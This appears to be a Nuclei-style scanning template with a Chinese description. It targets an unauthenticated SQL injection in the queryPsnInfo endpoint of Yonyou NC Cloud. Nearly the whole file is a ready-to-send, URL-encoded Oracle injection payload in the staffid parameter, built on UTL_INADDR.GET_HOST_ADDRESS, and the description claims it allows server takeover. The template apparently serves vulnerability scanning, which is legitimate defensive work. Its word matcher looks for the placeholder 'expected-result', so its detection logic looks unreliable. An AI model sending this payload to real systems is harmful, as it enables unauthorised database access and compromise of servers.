id: 用友NC Cloud系统queryPsnInfo接口SQL注入

info:
  name: 用友NC Cloud系统queryPsnInfo接口SQL注入
  author: admin
  severity: high
  description: 攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口，利用 staffid 参数的缺乏校验，通过传入恶意的 SQL 语句进行命令注入，从而控制服务器。
  tags: oracle,sql,injection,timing

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ncchr/pm/obj/queryPsnInfo?staffid=1'%20AND%201754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281754%3D1754%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--%20Nzkh"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
      Accept: text/html, image/gif, image/jpeg, */*; q=.2, */*; q=.2
      Connection: close

    matchers:
      - type: word
        words:
          - "expected-result" 

    extractors:
      - type: regex
        regex:
          - "未知的主机"
          - "Unknown host"